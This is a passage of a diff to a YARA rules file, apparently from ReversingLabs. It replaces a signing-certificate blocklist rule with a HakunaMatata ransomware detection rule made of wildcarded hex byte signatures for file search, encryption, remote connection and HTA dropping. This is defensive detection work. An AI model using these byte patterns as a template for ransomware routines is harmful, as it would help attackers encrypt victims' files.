+            31 DB 43 53 56 E8 ?? ?? ?? ?? 59 5A 53 50 E8 ?? ?? ?? ?? 59 5A 8D 74 24 ?? 89 C2 89
+            F1 57 E8 ?? ?? ?? ?? 58 39 1E 0F 85 ?? ?? ?? ?? F2 0F 10 44 24 ?? A1 ?? ?? ?? ?? 8D
+            74 24 ?? F2 0F 11 84 24 ?? ?? ?? ?? 8B 00 83 F8 ?? 72 ?? 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 31 C0 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            89 54 24 ?? 40 89 84 24 ?? ?? ?? ?? 83 A4 24 ?? ?? ?? ?? ?? 89 B4 24 ?? ?? ?? ?? 89
+            84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? 8B 44 24 ?? 89 44 24 ?? 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 74 24 ?? 56 8D 9C 24 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
+            83 C4 ?? 89 D9 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 58 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59
+            8D BC 24 ?? ?? ?? ?? 89 C3 89 84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 F9 6A ?? E8 ?? ??
+            ?? ?? 58 83 64 24 ?? ?? 83 64 24 ?? ?? 57 E8 ?? ?? ?? ?? 59 8D 4C 24 ?? 51 56 6A ??
+            68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 53 E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"MPS\"" and ( pe.signatures [ i ] . serial == "00:98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" or pe.signatures [ i ] . serial == "98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" ) and 1575849600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $drop_hta_file_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_86E5A9B9E89E5075C475006D0Ca03832 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hakunamatata : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HakunaMatata ransomware."
 		author = "ReversingLabs"
-		id = "f3058f56-dcbb-532a-b914-5ac0e6d70e6e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "17438fcd-7a51-5fb6-96ac-38523bc1744f"
+		date = "2020-11-11"
+		modified = "2020-11-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L3696-L3714"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5ba0b0f1b104eb11023590b8ef2b9cc747372bc9310a754694d45d3b3ce293e9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.HakunaMatata.yara#L1-L373"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e363ff93fce286d60a3f5ea20ba3ec03564b7a5321c3f6448cc82187f23e8a9f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HakunaMatata"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
+            85 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 14 24 89 C1 E8 ??
+            ?? ?? ?? 83 EC ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B
+            45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83
+            EC ?? 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B
+            45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 54 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ??
+            01 D0 01 C0 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ??
+            ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24
+            A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8B 45 ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ??
+            39 C8 76 ?? 89 C8 89 DA 89 45 ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ??
+            89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ??
+            83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89
+            54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C6 8B 45 ?? 89 C1 BB
+            ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 CF 31 C7 89 7D ?? 89 DF 31 D7 89 7D ?? 8B 45 ?? 0B
+            45 ?? 85 C0 0F 94 C0 0F B6 C8 8B 55 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89
+            F0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24
+            A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 8B 45 ?? 85 C0
+            79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ??
+            8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0
+            83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ??
+            8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89 45 ?? 89 55 ?? 8B 45 ?? BA ?? ??
+            ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83 F6 ?? 89 75 ?? 89 D0 80 F4 ?? 89
+            45 ?? 8B 55 ?? 8B 4D ?? 89 C8 09 D0 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ??
+            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89
+            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
+            ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83
+            EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5F 5D C2
+        }
+		$encrypt_files_2 = {
+            55 89 E5 56 53 81 EC ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 89 85
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? 84 C0 0F 84 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF
+            D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89
+            44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95 C0 84 C0 0F 84
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ??
+            8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C3 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C6 89 F0 09 D8 85 C0
+            74 ?? 8B 45 ?? 8B 55 ?? 3B 95 ?? ?? ?? ?? 72 ?? 3B 95 ?? ?? ?? ?? 77 ?? 3B 85 ?? ??
+            ?? ?? 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ??
+            89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? 89 44 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ?? 01 D0 01 C0 89
+            45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89
+            44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ??
+            FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
+            ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ?? 39 C8 76 ?? 89
+            C8 89 DA 89 45 ?? 8B 4D ?? 8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89
+            4C 24 ?? 89 54 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94
+            C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89 54 24 ?? 89 04
+            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B 55 ??
+            89 CE 31 C6 89 B5 ?? ?? ?? ?? 89 DE 31 D6 89 B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5
+            ?? ?? ?? ?? 89 D8 09 F0 85 C0 0F 94 C0 88 45 ?? 8B 55 ?? 0F B6 4D ?? 8B 5D ?? 8B 45
+            ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ??
+            ?? FF D0 89 45 ?? 8B 45 ?? 85 C0 79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ??
+            8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 45
+            ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ??
+            ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89
+            45 ?? 89 55 ?? 8B 45 ?? BA ?? ?? ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83
+            F6 ?? 89 B5 ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5 ??
+            ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ??
+            ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 2B
+            45 ?? 1B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B
+            55 ?? 39 D3 72 ?? 39 D3 77 ?? 39 C1 76 ?? 89 C1 89 D3 89 4D ?? 8B 45 ?? C7 44 24 ??
+            ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24
+            A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B
+            45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ??
+            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? 8B 45 ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ?? 29 C8 19 DA 89 45 ?? 89 55 ?? 8B
+            45 ?? 8B 55 ?? 89 C3 80 F7 ?? 89 9D ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B
+            9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B
+            45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ??
+            FF D0 83 EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5D C2
+        }
+		$search_files = {
+            E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 95 C0 88 45 ?? 80 7D ?? ?? 74 ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ??
+            83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 83 45 ?? ?? EB ?? A1 ??
+            ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ?? ?? ?? 83 EC
+            ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8
+            ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 89
+            C1 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            89 1C 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 89 C1
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 90 8D 85
+            ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95
+            C0 84 C0 74 ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ??
+            ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ??
+            ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7
+            04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45
+            ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 05 ??
+            ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0
+            74 ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C2 8B 85 ?? ?? ?? ?? 89 14 24 89 C1
+            E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 C2 8B 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8
+            ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
+        }
+		$search_files_2 = {
+            FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ??
+            83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B
+            00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ??
+            ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ??
+            ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
+            89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8
+        }
+		$remote_connection = {
+            55 89 E5 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 44 24 ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8
+            ?? ?? ?? ?? 8B 45 ?? 8B 00 89 45 ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8D 45
+            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ??
+            ?? ?? 75 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 39 45 ?? 77 ?? 8D 45 ??
+            89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 8D 45 ?? 8D 4D ?? 89 4C 24 ?? 89 14 24 89 C1 E8
+            ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC
+            ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 45 ??
+            ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 81 7D ?? ?? ?? ?? ?? 75 ?? E9 ??
+            ?? ?? ?? 8D 45 ?? 83 C0 ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 8B 45 ??
+            05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8
+            ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 90 8D 45 ?? 89
+            C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89
+            C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 89 D8 89 04 24 E8 ?? ??
+            ?? ?? 90 8B 5D ?? C9 C2
+        }
+		$remote_connection_2 = {
+            55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ??
+            ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89
+            44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ??
+            74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ??
+            ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B
+            45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04
+            43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ??
+            74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
+            8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2
+        }
+		$encrypt_files_3 = {
+            55 57 56 53 83 EC ?? 8B 41 ?? 85 C0 75 ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
